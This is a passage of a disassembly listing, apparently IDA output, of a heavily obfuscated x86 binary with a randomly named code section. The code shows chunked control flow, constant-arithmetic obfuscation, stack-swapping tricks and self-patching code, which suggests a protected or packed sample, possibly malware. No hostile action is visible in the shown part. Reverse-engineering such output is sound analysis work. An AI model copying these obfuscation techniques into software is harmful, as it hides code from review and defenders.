; FUNCTION CHUNK AT 00439B03 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455BF7 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00458A7B SIZE 0000001A BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		sub	eax, [ebp-0Ch]
		mov	[ebp-0Ch], eax

loc_44063B:				; CODE XREF: sub_44E72F-10C77j
					; sub_44E72F+8F9Fj ...
		mov	eax, [ebp-20h]
		jmp	loc_439B03
sub_440631	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_440643	proc near		; CODE XREF: sub_44A994+8p

var_24		= dword	ptr -24h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043BD47 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043BE30 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043BFA9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043C33D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D54E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043DF24 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043F0DE SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00440471 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00440784 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 004410A0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441AA2 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004437F7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004444DB SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00444CEB SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004460F3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004462B9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447AA1 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004487E1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004488EB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448C86 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A45D SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044B371 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BAB0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C140 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044C4D0 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044C801 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044C98B SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044CBC3 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044D0C4 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044EC83 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F98F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044FBB4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450687 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004506BE SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004508FA SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00450A20 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00451E84 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00451FEA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004528B2 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004529D0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004533BF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453A7C SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00453B36 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004549DF SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045686D SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004584BC SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004586D4 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00459A52 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045A169 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A580 SIZE 0000001A BYTES

		push	eax
		mov	eax, ebp
		xchg	eax, [esp+0Ch+var_C]
		mov	ebp, esp

loc_44064B:				; CODE XREF: sub_440C05:loc_44DE20j
		push	esi
		mov	esi, ecx
		xchg	esi, [esp+10h+var_10]
		mov	esp, ebp
		jmp	loc_450687
sub_440643	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dd 0A3AF8A0Fh, 0C9810001h, 72815ACDh ; CODE XREF: hvvrg7ie:loc_444C96j
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451669

loc_440664:				; CODE XREF: sub_451669:loc_459ACDj
		or	eax, 0EC6A9690h
		call	sub_445F5B

loc_44066F:				; CODE XREF: sub_43933B+Cj
		jmp	nullsub_427
; END OF FUNCTION CHUNK	FOR sub_451669
; ---------------------------------------------------------------------------

loc_440674:				; CODE XREF: hvvrg7ie:0043C1F6j
		mov	eax, [esp]

loc_440677:				; CODE XREF: hvvrg7ie:loc_45B3A2j
		push	offset loc_45B51F
		jmp	loc_4516AD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EE33

loc_440681:				; CODE XREF: sub_43EE33:loc_44FA01j
		add	ebx, 48C7C53h
		xchg	ebx, [esp+30h+var_30]
		jmp	sub_44B69F
; END OF FUNCTION CHUNK	FOR sub_43EE33
; ---------------------------------------------------------------------------
		call	sub_4408FA
; START	OF FUNCTION CHUNK FOR sub_44C33E

loc_440694:				; CODE XREF: sub_44C33E+16j
		jmp	loc_43EF55
; END OF FUNCTION CHUNK	FOR sub_44C33E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BDC2

loc_440699:				; CODE XREF: sub_43BDC2:loc_43BA8Ej
		sub	eax, 0B369F771h
		call	sub_456E27

loc_4406A4:				; CODE XREF: hvvrg7ie:00454410j
		jmp	nullsub_535
; END OF FUNCTION CHUNK	FOR sub_43BDC2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_4406A9:				; CODE XREF: sub_4465A6+A923j
		jmp	loc_440266
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_4406AE:				; CODE XREF: sub_45A234:loc_43B4C6j
		and	ebx, 3B08E0A5h
		add	ebx, 0E643DF6Ch
		xchg	ebx, [esp+0]
		jmp	loc_442D79
; END OF FUNCTION CHUNK	FOR sub_45A234
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455BE2

loc_4406C2:				; CODE XREF: sub_455BE2:loc_439070j
		xchg	ecx, [esp+0]
		jmp	sub_44D2C6
; END OF FUNCTION CHUNK	FOR sub_455BE2
; ---------------------------------------------------------------------------
		jns	loc_45A189
		add	ebx, eax
		push	0B3E74412h
		pop	eax
		sub	eax, 52FED9B1h
		add	eax, 9F5D0E5Fh
		jmp	loc_45AE30

; =============== S U B	R O U T	I N E =======================================



sub_4406E9	proc near		; DATA XREF: sub_459BE2+Eo

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B862 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459FB7 SIZE 00000014 BYTES

		push	ebx
		push	7C2598A5h
		pop	ebx
		add	ebx, 3A72E3E2h
		and	ebx, 58A92C52h
		rol	ebx, 19h
		jmp	loc_43B862
sub_4406E9	endp

; ---------------------------------------------------------------------------

locret_440704:				; CODE XREF: hvvrg7ie:loc_4567E8j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F0A1

loc_440705:				; CODE XREF: sub_43F0A1+12j
		jmp	loc_441E62
; END OF FUNCTION CHUNK	FOR sub_43F0A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_44070A:				; CODE XREF: sub_43B6A5+1063j
					; sub_44E3B3+7C18j
		mov	[ecx], edx
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; START	OF FUNCTION CHUNK FOR sub_44AB90

loc_44070C:				; CODE XREF: sub_44AB90:loc_459016j
		call	sub_44DE0A
		push	6DCB94C9h
		pop	edx
		add	edx, 0C99010A9h
		rol	edx, 1Dh
		jmp	loc_455411
; END OF FUNCTION CHUNK	FOR sub_44AB90
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B7B9

loc_440725:				; CODE XREF: sub_43B7B9:loc_45B127j
		jnz	loc_45170B
		jmp	loc_44136D
; END OF FUNCTION CHUNK	FOR sub_43B7B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6D7

loc_440730:				; CODE XREF: sub_44A6D7:loc_4593C1j
					; sub_458706:loc_4593E1j
		sub	edi, 0B77BBA28h
		add	edi, 0B7D13E9Eh
		xchg	edi, [esp+0]
		jmp	sub_439549
; END OF FUNCTION CHUNK	FOR sub_44A6D7
; ---------------------------------------------------------------------------

loc_440744:				; CODE XREF: hvvrg7ie:00458FAEj
		push	32B324A7h
		pop	ebx
		and	ebx, 0EFF4A18Dh
		or	ebx, 4249CDC9h
		add	ebx, 7C997DD9h
		rol	ebx, 0Ah
		jmp	loc_44A2BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_440764:				; CODE XREF: sub_454099:loc_43F268j
		jge	loc_44747D
		jmp	loc_440275
; END OF FUNCTION CHUNK	FOR sub_454099
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_507. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		jns	loc_44BA8B
		mov	eax, [esp]
		push	ecx
		mov	ecx, edx
		xchg	ecx, [esp]
		jmp	loc_456374
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_440784:				; CODE XREF: sub_440643:loc_453B3Cj
		pop	ecx
		retn
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426E2

loc_440786:				; CODE XREF: sub_4426E2+6j
		push	offset loc_441158
		jmp	loc_454E4F
; END OF FUNCTION CHUNK	FOR sub_4426E2
; ---------------------------------------------------------------------------

loc_440790:				; CODE XREF: hvvrg7ie:0043CB35j
		xchg	edi, esi
		mov	esi, [ebx]

loc_440794:				; CODE XREF: hvvrg7ie:loc_44A47Dj
		call	sub_440AC5
		retn
; ---------------------------------------------------------------------------

loc_44079A:				; CODE XREF: hvvrg7ie:00450740j
		call	sub_448768
		test	al, al
		jz	loc_43F404
		jmp	loc_455FBA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446EC2

loc_4407AC:				; CODE XREF: sub_446EC2+Dj
		jz	loc_457691
		jmp	loc_4472A9
; END OF FUNCTION CHUNK	FOR sub_446EC2

; =============== S U B	R O U T	I N E =======================================



sub_4407B7	proc near		; DATA XREF: sub_44E6A5-E6FCo
		mov	[esi], eax
		pop	esi
sub_4407B7	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_4407BA:				; CODE XREF: hvvrg7ie:00439F9Ej
					; sub_44BCAE-9B95j
		jnz	loc_43F6C3
		sub	eax, 1D8D101Dh
		push	offset loc_44BBDD
		jmp	loc_440CF4
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; ---------------------------------------------------------------------------

loc_4407D0:				; CODE XREF: hvvrg7ie:0043CF0Cj
		jge	loc_43F135
		jg	loc_44A332

loc_4407DC:				; CODE XREF: hvvrg7ie:004440F8j
		or	edi, 0B1163580h
		add	edi, 48E55AC8h
		xchg	edi, [esp]
		jmp	nullsub_18
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A2AF

loc_4407F0:				; CODE XREF: sub_44A2AF+B11j
		xor	eax, 48C25DFh
		add	eax, 0CAFD33B0h
		xchg	eax, [esp+0]
		jmp	sub_455751
; END OF FUNCTION CHUNK	FOR sub_44A2AF
; ---------------------------------------------------------------------------

loc_440804:				; CODE XREF: hvvrg7ie:00450E85j
		jnz	loc_44D88B

loc_44080A:				; CODE XREF: hvvrg7ie:loc_450E72j
		sub	ebx, 9B9F1978h
		cmp	ebx, 0FE6E10CEh
		jmp	loc_45A9B2

; =============== S U B	R O U T	I N E =======================================



sub_44081B	proc near		; CODE XREF: hvvrg7ie:0044FB47j
					; hvvrg7ie:0044FE2Ap

; FUNCTION CHUNK AT 00440CEF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450582 SIZE 0000000E BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	edx
		call	sub_458D28
		mov	eax, 4CF1C9EDh
		call	sub_450C5A
		mov	ds:dword_41D110, eax
		jmp	loc_450582
sub_44081B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440AD9

loc_44083A:				; CODE XREF: sub_440AD9:loc_43FD41j
					; sub_43C989:loc_4401D6j
		cmp	ebx, 0D601E3A7h
; END OF FUNCTION CHUNK	FOR sub_440AD9
; START	OF FUNCTION CHUNK FOR sub_44955C

loc_440840:				; CODE XREF: sub_44955C:loc_44B054j
		jmp	loc_45327C
; END OF FUNCTION CHUNK	FOR sub_44955C
; ---------------------------------------------------------------------------

loc_440845:				; CODE XREF: hvvrg7ie:loc_44ACCBj
		jnz	loc_43EB1B
		jmp	loc_450F92
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B7CB

loc_440850:				; CODE XREF: sub_44B7CB-27AEj
		mov	[edi], ebp
		xor	ebp, edx
		test	ecx, ebx
		jmp	loc_45984D
; END OF FUNCTION CHUNK	FOR sub_44B7CB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D47A

loc_44085B:				; CODE XREF: sub_44D47A:loc_43C653j
		call	sub_451703

loc_440860:				; CODE XREF: sub_44D47A+6j
					; sub_44D47A+788Fj
		xchg	eax, [esp+0]
		mov	edx, eax
		call	sub_456DE7
		pop	edx
		pop	eax
		jmp	loc_44A051
; END OF FUNCTION CHUNK	FOR sub_44D47A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408FA

loc_440871:				; CODE XREF: sub_4408FA-551Fj
		mov	esi, eax
		xchg	esi, [esp-4+arg_0]
		push	ecx
		call	sub_44F4D4

loc_44087C:				; CODE XREF: hvvrg7ie:004530BCj
		jmp	loc_450475
; END OF FUNCTION CHUNK	FOR sub_4408FA

; =============== S U B	R O U T	I N E =======================================



sub_440881	proc near		; CODE XREF: sub_449E1D+10p
					; hvvrg7ie:004561DFj

; FUNCTION CHUNK AT 0043D02F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004450EF SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004486DB SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0044E5B9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045158E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045536E SIZE 0000000E BYTES

		xchg	edx, [esp+0]
		pop	edx
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_443D7D
		jmp	loc_45158E
sub_440881	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AB23

loc_440894:				; CODE XREF: sub_44AB23:loc_443E22j
		jmp	ds:off_41D1B0
; END OF FUNCTION CHUNK	FOR sub_44AB23
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453EFC

loc_44089A:				; CODE XREF: sub_453EFC+Aj
		jmp	loc_4527E9
; END OF FUNCTION CHUNK	FOR sub_453EFC
; ---------------------------------------------------------------------------

loc_44089F:				; CODE XREF: hvvrg7ie:0045042Fj
		jmp	sub_43FC15
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4447AC

loc_4408A4:				; CODE XREF: sub_4447AC+BC22j
		jmp	loc_4394CC
; END OF FUNCTION CHUNK	FOR sub_4447AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BF66

loc_4408A9:				; CODE XREF: sub_44BF66-8CA3j
		jmp	loc_44BFCE
; END OF FUNCTION CHUNK	FOR sub_44BF66

; =============== S U B	R O U T	I N E =======================================



sub_4408AE	proc near		; CODE XREF: sub_44AB23p
					; sub_457B8C:loc_4553ABj ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C0BF SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00444EA3 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044624B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447E4C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044960E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00449CD7 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044AF94 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044D7BB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E01E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F445 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044F6AA SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00450496 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450F60 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453343 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045397B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453DEC SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00453F69 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045718E SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00457659 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457B9E SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00457CB8 SIZE 0000000E BYTES

		pop	edx
		jo	loc_457B9E
		mov	eax, [esp-4+arg_0]
		jmp	loc_453F69
sub_4408AE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_4408BD:				; CODE XREF: hvvrg7ie:00448A37j
					; sub_45038B+1Cj
		rol	ebx, 1Bh
		call	sub_44F4AE

loc_4408C5:				; CODE XREF: sub_44BEBB:loc_43B484j
		cmp	ebx, 0AA90C3A3h
		jmp	loc_44604B
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------

loc_4408D0:				; CODE XREF: hvvrg7ie:004595ABj
		xchg	ebx, [esi]
		pop	ecx

loc_4408D3:				; CODE XREF: hvvrg7ie:loc_43C8BAj
					; hvvrg7ie:00445398j
		call	sub_456335
		push	offset loc_44A92A
		jmp	loc_44C567
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454789

loc_4408E2:				; CODE XREF: sub_454789-3206j
		jnp	loc_44F472
		push	edx

loc_4408E9:				; CODE XREF: sub_44E3B3:loc_43FBA8j
		jmp	loc_43C849
; END OF FUNCTION CHUNK	FOR sub_454789
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447662

loc_4408EE:				; CODE XREF: sub_447662+134AAj
		push	offset loc_45747D
		jmp	nullsub_536
; END OF FUNCTION CHUNK	FOR sub_447662
; ---------------------------------------------------------------------------

loc_4408F8:				; CODE XREF: hvvrg7ie:0043E3A0j
		sbb	ecx, eax

; =============== S U B	R O U T	I N E =======================================



sub_4408FA	proc near		; CODE XREF: hvvrg7ie:0044068Fp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043ADC5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B3D3 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00440871 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00445174 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450475 SIZE 00000011 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	eax
		jmp	loc_43ADC5
sub_4408FA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439873

loc_440904:				; CODE XREF: sub_439873:loc_43BA12j
		jb	loc_44CA77
		xchg	esi, [ebp+0]
		xchg	ebp, edi
		jp	loc_43E862
		jmp	loc_44CA77
; END OF FUNCTION CHUNK	FOR sub_439873
; ---------------------------------------------------------------------------
		xchg	ebx, [edx]
		pop	edx
		jmp	sub_4580CF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446FC5

loc_440922:				; CODE XREF: sub_446FC5+13j
		xchg	eax, [esp+0]
		jmp	loc_4511D0
; END OF FUNCTION CHUNK	FOR sub_446FC5
; ---------------------------------------------------------------------------

loc_44092A:				; CODE XREF: hvvrg7ie:loc_44B1D3j
					; hvvrg7ie:0044B1E0j
		or	edi, 6C40095Bh
		sub	edi, 666B64E8h
		add	edi, 68C4A6B9h
		xchg	edi, [esp]
		jmp	loc_458270

; =============== S U B	R O U T	I N E =======================================



sub_440944	proc near		; CODE XREF: hvvrg7ie:0043FDC3j
					; sub_448663:loc_44D446p

; FUNCTION CHUNK AT 00457153 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	9D6D6F63h
		pop	ecx
		sub	ecx, 715687A8h
		or	ecx, 0D2120CA3h
		push	offset loc_44D404
		jmp	loc_457153
sub_440944	endp


; =============== S U B	R O U T	I N E =======================================



sub_440964	proc near		; DATA XREF: sub_45190C-1404Do

; FUNCTION CHUNK AT 00439A85 SIZE 00000005 BYTES

		call	sub_450C5A
		mov	ds:off_41D0D0, eax
		lea	eax, sub_45190C
		mov	byte ptr [eax],	0C3h
		jmp	loc_439A85
sub_440964	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_44097D:				; CODE XREF: hvvrg7ie:loc_444420j
					; sub_450434:loc_44EA8Bj
					; DATA XREF: ...
		xchg	esi, [esp+0]
		push	esi
		pop	ebx
		pop	esi
		pop	ecx
		pop	edx
		xchg	ecx, [esp-0Ch+arg_8]
		jmp	loc_448F0C
; END OF FUNCTION CHUNK	FOR sub_450434

; =============== S U B	R O U T	I N E =======================================



sub_44098D	proc near		; CODE XREF: sub_44DB53+4EE6j

var_4		= dword	ptr -4

		push	ebp
		mov	ebp, ecx
		xchg	ebp, [esp+4+var_4]
		push	offset sub_44B031
		jmp	nullsub_515
sub_44098D	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_271. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44099E:				; CODE XREF: hvvrg7ie:0045728Dj
		jmp	loc_44FD66
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CAA5

loc_4409A3:				; CODE XREF: sub_43CAA5+7j
		jmp	nullsub_486
; END OF FUNCTION CHUNK	FOR sub_43CAA5
; ---------------------------------------------------------------------------

loc_4409A8:				; CODE XREF: hvvrg7ie:0043BC56j
		jmp	locret_4591F3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C2EA

loc_4409AD:				; CODE XREF: sub_44C2EA+3j
		xchg	ecx, [esp+0]
		push	8BC5B673h
		pop	esi
		add	esi, 0C45C91F7h
		and	esi, ds:4000F9h
		jmp	loc_44EA3B
; END OF FUNCTION CHUNK	FOR sub_44C2EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DB4C

loc_4409C7:				; CODE XREF: sub_43DB4C+5EE2j
		jnz	loc_439D41
; END OF FUNCTION CHUNK	FOR sub_43DB4C
; START	OF FUNCTION CHUNK FOR sub_446F91

loc_4409CD:				; CODE XREF: sub_446F91+51DEj
		jmp	loc_4599D3
; END OF FUNCTION CHUNK	FOR sub_446F91
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_4409D2:				; CODE XREF: sub_43E128+89BAj
		jmp	loc_459515
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
		push	eax
		or	esi, ebx
		not	esi
		jmp	loc_43EA85
; ---------------------------------------------------------------------------

loc_4409E1:				; CODE XREF: hvvrg7ie:00454F28j
		mov	eax, ecx
		and	ebp, 8ECE4247h
		xor	eax, 8035C0F3h

loc_4409EF:				; CODE XREF: hvvrg7ie:loc_446547j
		and	edi, 18FFE6AAh
		add	edi, 111EE178h
		jmp	loc_45B8EF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443048

loc_440A00:				; CODE XREF: sub_443048:loc_450E56j
		jz	loc_44FAEC
		sbb	edi, edx
		sub	ebx, esi
		jmp	loc_44FAEC
; END OF FUNCTION CHUNK	FOR sub_443048
; ---------------------------------------------------------------------------

loc_440A0F:				; CODE XREF: hvvrg7ie:loc_4495B4j
		call	sub_447793
; START	OF FUNCTION CHUNK FOR sub_43AF52

loc_440A14:				; CODE XREF: sub_43AF52+12j
		jmp	loc_4470BA
; END OF FUNCTION CHUNK	FOR sub_43AF52
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_34. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518BD

loc_440A1A:				; CODE XREF: sub_4518BD+4939j
		jmp	loc_44E0F4
; END OF FUNCTION CHUNK	FOR sub_4518BD
; ---------------------------------------------------------------------------

loc_440A1F:				; CODE XREF: hvvrg7ie:0043E8F0j
		jnb	loc_4550D4
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_440A25:				; CODE XREF: sub_442FD1-4B6j
		add	eax, 0BF05C062h
		add	eax, ebp
		add	eax, 768C9C75h
		mov	eax, [eax]
		push	ebx
		pushf
		jmp	loc_4414B2
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4512A0

loc_440A3C:				; CODE XREF: sub_452265-17A40j
					; sub_4512A0:loc_44899Aj
		jz	loc_454FF1
		jmp	loc_4465B3
; END OF FUNCTION CHUNK	FOR sub_4512A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCC7

loc_440A47:				; CODE XREF: sub_43CCC7+Aj
		add	eax, ebp
		add	eax, 0BFD42091h
		mov	eax, [eax]
		xor	edx, edx
		div	dword ptr [ebp-8]
		jmp	loc_43ED22
; END OF FUNCTION CHUNK	FOR sub_43CCC7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_440A5B:				; CODE XREF: sub_45038B+54A8j
		test	ecx, 2
		jmp	loc_45A1BF
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449AD1

loc_440A66:				; CODE XREF: sub_449AD1:loc_44D4BDj
		jl	loc_440FBB
		adc	edi, edx
		not	eax
		jmp	loc_440FBB
; END OF FUNCTION CHUNK	FOR sub_449AD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439E6C

loc_440A75:				; CODE XREF: sub_439E6C:loc_4451A1j
		pop	ecx
		mov	eax, [esp-4+arg_0]
		call	sub_43B63C

loc_440A7E:				; CODE XREF: sub_456676+6j
		jmp	loc_45756B
; END OF FUNCTION CHUNK	FOR sub_439E6C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_440A83:				; CODE XREF: sub_45A234-11146j
		jmp	loc_43A693
; END OF FUNCTION CHUNK	FOR sub_45A234
; ---------------------------------------------------------------------------
		pop	edx
		xchg	ebp, [esp]
		mov	eax, ebp
		pop	ebp
		jmp	loc_455C19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_440A94:				; CODE XREF: sub_445CCD:loc_456349j
		push	esi
		mov	esi, ecx
		xchg	esi, [esp+10h+var_10]
		push	offset loc_43CE9E
		jmp	loc_445804
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D964

loc_440AA4:				; CODE XREF: sub_43D964-3704j
		xchg	edi, [esi]

loc_440AA6:				; CODE XREF: sub_43D964:loc_43A253j
		xor	eax, 715A8649h
		add	eax, ebp
		push	edi
		push	78A9566Ch
		pop	edi
		jmp	loc_446506
; END OF FUNCTION CHUNK	FOR sub_43D964

; =============== S U B	R O U T	I N E =======================================



sub_440ABA	proc near		; CODE XREF: sub_45B07D+1Aj

var_4		= dword	ptr -4

		push	ebx

loc_440ABB:				; CODE XREF: sub_440195:loc_448D7Dp
		xchg	edx, [esp+4+var_4]
		pop	edx
		call	sub_440AC5

locret_440AC4:				; CODE XREF: hvvrg7ie:loc_45A607j
		retn
sub_440ABA	endp


; =============== S U B	R O U T	I N E =======================================



sub_440AC5	proc near		; CODE XREF: hvvrg7ie:loc_440794p
					; sub_440ABA+5p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004404B5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045885E SIZE 00000010 BYTES

		push	ebx
		mov	ebx, ebp
		jmp	loc_45885E
sub_440AC5	endp


; =============== S U B	R O U T	I N E =======================================



sub_440ACD	proc near		; CODE XREF: hvvrg7ie:0044FF84j
					; hvvrg7ie:00458770p

arg_0		= dword	ptr  4

		xchg	edi, [esp+0]
		pop	edi
		xchg	ecx, [esp-4+arg_0]
		jmp	loc_448C81
sub_440ACD	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_440AD9	proc near		; CODE XREF: sub_4403B6+368Cp
					; hvvrg7ie:00457DC3j

; FUNCTION CHUNK AT 0043B1FB SIZE 00000006 BYTES
